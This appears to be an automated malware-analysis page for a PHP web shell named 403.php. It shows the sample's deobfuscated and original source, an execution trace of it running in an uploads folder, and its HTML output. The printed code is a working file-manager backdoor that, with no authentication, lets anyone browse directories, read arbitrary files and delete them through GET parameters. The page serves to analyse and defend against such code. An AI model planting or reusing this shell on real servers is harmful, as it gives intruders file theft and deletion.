PHP Malware Analysis

403.php

md5: 1a375e532de9f6efe8ae5a9d68a4d5d4

Jump to: 

Screenshot
Attributes
Input

Deobfuscated PHP code
<?php

$root = "/var/www/html";
$style1 = 'color:#000;';
$style2 = 'color:#00a;font-weight:bold;';
function updir($ADir)
{
    $ADir = substr($ADir, 0, strlen($ADir) - 1);
    $ADir = substr($ADir, 0, strrpos($ADir, '/'));
    return $ADir;
}
if (isset($_GET['file'])) {
    if (isset($_GET['del'])) {
        unlink($_GET['file']);
        die;
    }
    if (is_file($_GET['file'])) {
        header("Content-type: text/plain");
        readfile($_GET['file']);
        return;
    }
    $path = $_GET['file'] . '/';
} else {
    $path = $root . '/';
}
echo $root . '<br>';
echo $path . '<hr>';
echo '<a href="?file=' . updir($path) . '">..</a><br />';
$p = $path . '*';
foreach (glob($p) as $file) {
    echo '<span style="font-size:11px;color:#777;">' . substr(sprintf('%o', fileperms($file)), -4) . '</span> <a style="' . (is_file($file) ? $style1 : $style2) . '" href="?file=' . $file . '">' . basename($file) . '</a> - <span style="font-size:11px;color:#777;">' . filesize($file) . ' - ' . date("F d Y H:i:s", filemtime($file)) . '</span><br />';
}
echo "<hr>";
Execution traces
data/traces/1a375e532de9f6efe8ae5a9d68a4d5d4_trace-1676252131.8615.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:35:57.759307]
1	0	1	0.000135	393512
1	3	0	0.000236	406264	{main}	1		/var/www/html/uploads/403.php	0	0
1		A						/var/www/html/uploads/403.php	2	$root = '/var/www/html/uploads'
1		A						/var/www/html/uploads/403.php	3	$style1 = 'color:#000;'
1		A						/var/www/html/uploads/403.php	4	$style2 = 'color:#00a;font-weight:bold;'
1		A						/var/www/html/uploads/403.php	27	$path = '/var/www/html/uploads/'
2	4	0	0.000303	406312	updir	1		/var/www/html/uploads/403.php	31	1	'/var/www/html/uploads/'
3	5	0	0.000316	406312	substr	0		/var/www/html/uploads/403.php	7	3	'/var/www/html/uploads/'	0	21
3	5	1	0.000331	406456
3	5	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/403.php	7	$ADir = '/var/www/html/uploads'
3	6	0	0.000356	406360	strrpos	0		/var/www/html/uploads/403.php	8	2	'/var/www/html/uploads'	'/'
3	6	1	0.000370	406432
3	6	R			13
3	7	0	0.000383	406360	substr	0		/var/www/html/uploads/403.php	8	3	'/var/www/html/uploads'	0	13
3	7	1	0.000395	406496
3	7	R			'/var/www/html'
2		A						/var/www/html/uploads/403.php	8	$ADir = '/var/www/html'
2	4	1	0.000423	406352
2	4	R			'/var/www/html'
1		A						/var/www/html/uploads/403.php	32	$p = '/var/www/html/uploads/*'
2	8	0	0.000450	406360	glob	0		/var/www/html/uploads/403.php	33	1	'/var/www/html/uploads/*'
2	8	1	0.000506	406944
2	8	R			[0 => '/var/www/html/uploads/403.php', 1 => '/var/www/html/uploads/data', 2 => '/var/www/html/uploads/prepend.php']
2	9	0	0.000545	406912	fileperms	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	9	1	0.000563	406984
2	9	R			33204
2	10	0	0.000576	406944	sprintf	0		/var/www/html/uploads/403.php	34	2	'%o'	33204
2	10	1	0.000590	407328
2	10	R			'100664'
2	11	0	0.000603	407264	substr	0		/var/www/html/uploads/403.php	34	2	'100664'	-4
2	11	1	0.000615	407360
2	11	R			'0664'
2	12	0	0.000628	407040	is_file	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	12	1	0.000641	407080
2	12	R			TRUE
2	13	0	0.000655	407104	basename	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	13	1	0.000669	407168
2	13	R			'403.php'
2	14	0	0.000683	407168	filesize	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	14	1	0.000696	407208
2	14	R			953
2	15	0	0.000709	407168	filemtime	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/403.php'
2	15	1	0.000721	407208
2	15	R			1676252131
2	16	0	0.000734	407168	date	0		/var/www/html/uploads/403.php	34	2	'F d Y H:i:s'	1676252131
2	16	1	0.000790	409560
2	16	R			'February 12 2023 20:35:31'
2	17	0	0.000808	409008	fileperms	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	17	1	0.000825	409048
2	17	R			16895
2	18	0	0.000837	409008	sprintf	0		/var/www/html/uploads/403.php	34	2	'%o'	16895
2	18	1	0.000850	409392
2	18	R			'40777'
2	19	0	0.000863	409328	substr	0		/var/www/html/uploads/403.php	34	2	'40777'	-4
2	19	1	0.000875	409424
2	19	R			'0777'
2	20	0	0.000888	409104	is_file	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	20	1	0.000900	409144
2	20	R			FALSE
2	21	0	0.000913	409168	basename	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	21	1	0.000926	409232
2	21	R			'data'
2	22	0	0.000939	409232	filesize	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	22	1	0.000951	409272
2	22	R			4096
2	23	0	0.000964	409232	filemtime	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/data'
2	23	1	0.000976	409272
2	23	R			1676252131
2	24	0	0.000989	409232	date	0		/var/www/html/uploads/403.php	34	2	'F d Y H:i:s'	1676252131
2	24	1	0.001019	409560
2	24	R			'February 12 2023 20:35:31'
2	25	0	0.001034	409008	fileperms	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	25	1	0.001049	409056
2	25	R			33261
2	26	0	0.001062	409016	sprintf	0		/var/www/html/uploads/403.php	34	2	'%o'	33261
2	26	1	0.001074	409400
2	26	R			'100755'
2	27	0	0.001086	409336	substr	0		/var/www/html/uploads/403.php	34	2	'100755'	-4
2	27	1	0.001099	409432
2	27	R			'0755'
2	28	0	0.001111	409112	is_file	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	28	1	0.001124	409152
2	28	R			TRUE
2	29	0	0.001137	409176	basename	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	29	1	0.001156	409248
2	29	R			'prepend.php'
2	30	0	0.001170	409240	filesize	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	30	1	0.001183	409280
2	30	R			57
2	31	0	0.001196	409240	filemtime	0		/var/www/html/uploads/403.php	34	1	'/var/www/html/uploads/prepend.php'
2	31	1	0.001208	409280
2	31	R			1676252131
2	32	0	0.001220	409240	date	0		/var/www/html/uploads/403.php	34	2	'F d Y H:i:s'	1676252131
2	32	1	0.001250	409568
2	32	R			'February 12 2023 20:35:31'
1	3	1	0.001267	408528
			0.001292	316112
TRACE END   [2023-02-12 23:35:57.760491]


Generated HTML code
<html><head></head><body>/var/www/html<br>/var/www/html/<hr><a href="?file=/var/www">..</a><br><span style="font-size:11px;color:#777;">0664</span> <a style="color:#000;" href="?file=/var/www/html/403.php">403.php</a> - <span style="font-size:11px;color:#777;">953 - February 12 2023 20:35:25</span><br><span style="font-size:11px;color:#777;">0644</span> <a style="color:#000;" href="?file=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a> - <span style="font-size:11px;color:#777;">0 - February 12 2023 20:35:25</span><br><hr></body></html>
Original PHP code
<?php
$root = __DIR__;
$style1='color:#000;';
$style2='color:#00a;font-weight:bold;';

function updir($ADir){
	$ADir = substr($ADir, 0, strlen($ADir)-1);
	$ADir = substr($ADir, 0, strrpos($ADir, '/'));
	return $ADir;
}

if (isset($_GET['file'])) { 

	if (isset($_GET['del'])){
		unlink($_GET['file']);
		die;
	}

	if (is_file($_GET['file'])) {
		header("Content-type: text/plain");
		readfile($_GET['file']);
		return;
	}

	$path = $_GET['file'].'/';

} else $path = $root.'/';

echo($root.'<br>');
echo($path.'<hr>');
echo '<a href="?file='.updir($path).'">..</a><br />';
$p = $path.'*';
foreach (glob($p) as $file) {
	echo '<span style="font-size:11px;color:#777;">'.substr(sprintf('%o',fileperms($file)),-4).'</span> <a style="'.(is_file($file)?$style1:$style2).'" href="?file='.$file.'">'.basename($file).'</a> - <span style="font-size:11px;color:#777;">'.filesize($file).' - '.date("F d Y H:i:s", filemtime($file)).'</span><br />';
}
echo('<hr>');